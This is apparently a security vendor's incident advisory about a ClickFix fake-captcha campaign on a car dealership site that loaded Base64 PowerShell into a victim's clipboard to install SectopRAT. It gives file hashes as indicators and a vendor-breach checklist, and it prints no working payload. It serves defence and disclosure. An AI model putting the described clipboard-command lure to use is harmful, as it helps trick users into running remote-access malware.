On March 11th, 2025, SpearTip’s Managed Detection and Response team responded to an alert of malicious code execution at a car dealership. Investigation of the indicators and an interview with the user indicated that the user visited the website of the dealership, from which they were redirected and then prompted to execute a PowerShell command through a ClickFix social engineering campaign. The campaign attempted to deploy the SectopRAT (Remote Access Trojan), which can be used to control browsers and steal sensitive information from the host.
The Captcha page would load Base 64 encoded PowerShell into the clipboard, which, by following the commands on the screen, would be expected by the user. “idostream.com” is owned by LESAutomotive, a company focused on vehicle video marketing solutions, which explains why the videos are present within the websites of car dealerships.
While the ClickFix attacks are not new, SpearTip has not previously seen them delivered in this way; instead, they are often delivered through phishing emails. SpearTip recommends educating users on pop-ups while explaining the potential dangers, and recommending contact with their IT Administrator for next steps when they receive a pop-up instructing them to perform abnormal actions on their machine.
SpearTip’s Managed Detection and Response team operating out of our 24/7/365 Security Operations Center can help organizations actively detect and respond to malicious threats just like this one. Our services allow us to continuously monitor endpoints, identities, and user behaviors to protect organizations.
In addition, our Incident Response team assists organizations after they have been breached to help restore operations quickly and mitigate any further damage while working to find the root cause of a breach.
List of indicators
Dropped File, Lancaster.zip, SHA256
1a34c9b4500cf7859c36c102209902202fb7188aca1ba759f2d5018bf2655cc1
Dropped File, Stars_pack_version_21.3.1.zip, SHA256 6094ef164e5483ee1699a5c874c2c05fab0b3c15ef9bb5ab050c3bcfa8f14e43
Dropped File, zkwindow.exe, https://www.virustotal.com/gui/file/e11d68ee9294a55de8548687935567d030dae3a594d40ea75f88598f30ebb76e
Existence of File Path, %TEMP%\version_21
Use our compromise checklist below to help you decide on how to enhance your security posture if you feel you’ve been affected by a breach.
| Answer | |||||||
| Questions | Response 1 | Result | Response 2 | Result | Unknown | Result | |
| 1 | Do you have active services with the breached party? (If Yes, proceed to Question 2) | No | Yes | Unknown | Unknown Exposure – Treat as yes | ||
| 1b | Do you use a competitor of the breached party? | No | Not likely to be exposed | Yes | Minimal likelihood exposure | Unknown | Unknown Exposure |
| 1c | Do you have a vendor that utilizes the services of the breached party? | No | Not likely to be exposed | Yes | Potential Exposure | Unknown | Unknown Exposure – Treat as Potential Exposure |
| 2 | Do you have a secure VPN connection with the breached party? | Yes | Good | No | Potential for Action to taken | Unknown | Unknown Exposure |
| 3 | Do you require the breached party to utilize MFA when connecting to your systems? | Yes | Good | No | Potential for Action to taken | Unknown | Unknown Exposure |
| 4 | Do you require MFA to connect to the breached party? | Yes | Good | No | Potential for Action to taken | Unknown | Unknown Exposure |
| 5 | Have you configured SSO with the breached party? | Yes | Good | No | Potential for Action to taken | Unknown | Unknown Exposure |
| 6 | If not using SSO, are your account passwords with the third party common with your other credentials? | Yes | Good | No | Potential for Action to taken | Unknown | Unknown Exposure |
| 7 | Does the breached party have access to sensitive or critical data or systems in your environment? | No | Good | Yes | Potential for Action to taken | Unknown | Unknown Exposure |
| 8 | Do you share documents back and forth with the breached party? | No | Good | Yes | Potential for Action to taken | Unknown | Unknown Exposure |
| 9 | Does the documents you share with the breached party contain sensitive information? | No | Good | Yes | Potential for Action to taken | Unknown | Unknown Exposure |
| 10 | Aside from the data in the application, is there other data that the vendor knows about your organization that could be problematic such as credit card information or other financial information that could be exploited? | No | Good | Yes | Potential for Action to taken | Unknown | Unknown Exposure |
| 11 | Do you monitor for Dark Web data exposure? | Yes | Good | No | Potential for Action to taken | Unknown | Unknown Exposure |
Identify, neutralize, and counter cyberattacks - provide confidence in your security posture
©2025 SpearTip, LLC. All rights reserved.